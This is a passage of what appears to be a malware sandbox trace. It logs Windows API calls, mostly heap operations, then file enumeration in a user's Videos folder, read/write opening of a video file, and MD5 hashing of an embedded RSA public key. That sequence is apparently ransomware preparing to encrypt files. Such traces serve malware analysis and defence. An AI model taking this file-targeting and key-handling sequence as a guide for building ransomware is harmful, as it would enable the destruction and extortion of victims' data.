Size=0x60) returned 0x2cb4728 [0202.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\") returned="zpV7u7xPWr7qK\\" [0202.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0202.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0202.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\") returned="z2E0zT\\" [0202.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1c30 [0202.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0202.709] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0202.709] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0202.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.709] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0202.709] PathFindFileNameW (pszPath="") returned="" [0202.709] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd938fc0, ftCreationTime.dwHighDateTime=0x1d89e03, ftLastAccessTime.dwLowDateTime=0x34fdb060, ftLastAccessTime.dwHighDateTime=0x1d8a303, ftLastWriteTime.dwLowDateTime=0x34fdb060, ftLastWriteTime.dwHighDateTime=0x1d8a303, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0202.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0202.712] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd938fc0, ftCreationTime.dwHighDateTime=0x1d89e03, ftLastAccessTime.dwLowDateTime=0x34fdb060, ftLastAccessTime.dwHighDateTime=0x1d8a303, ftLastWriteTime.dwLowDateTime=0x34fdb060, ftLastWriteTime.dwHighDateTime=0x1d8a303, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.712] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48331ed0, ftCreationTime.dwHighDateTime=0x1d898d7, ftLastAccessTime.dwLowDateTime=0xd88d2300, ftLastAccessTime.dwHighDateTime=0x1d8a2b8, ftLastWriteTime.dwLowDateTime=0xd88d2300, ftLastWriteTime.dwHighDateTime=0x1d8a2b8, nFileSizeHigh=0x0, nFileSizeLow=0x1ade, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1l1mBiXT EDK.mkv", cAlternateFileName="1L1MBI~1.MKV")) returned 1 [0202.712] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\1l1mBiXT EDK.mkv") returned=".mkv" [0202.712] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\1l1mBiXT EDK.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\1l1mbixt edk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.712] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=6878) returned 1 [0202.713] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.716] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1ab8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.716] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.718] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.718] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1ade, lpOverlapped=0x0) returned 1 [0202.720] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.720] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.720] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.720] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.722] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.722] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.722] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.722] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.722] GetLastError () returned 0x0 [0202.722] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.722] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.722] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.722] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.723] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1ae0) returned 0x2ea99b0 [0202.723] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1c30 [0202.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1c78 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.724] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36c8 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea36b0 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.727] GetCurrentThreadId () returned 0x66c [0202.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9558 [0202.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.728] GetCurrentThreadId () returned 0x66c [0202.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 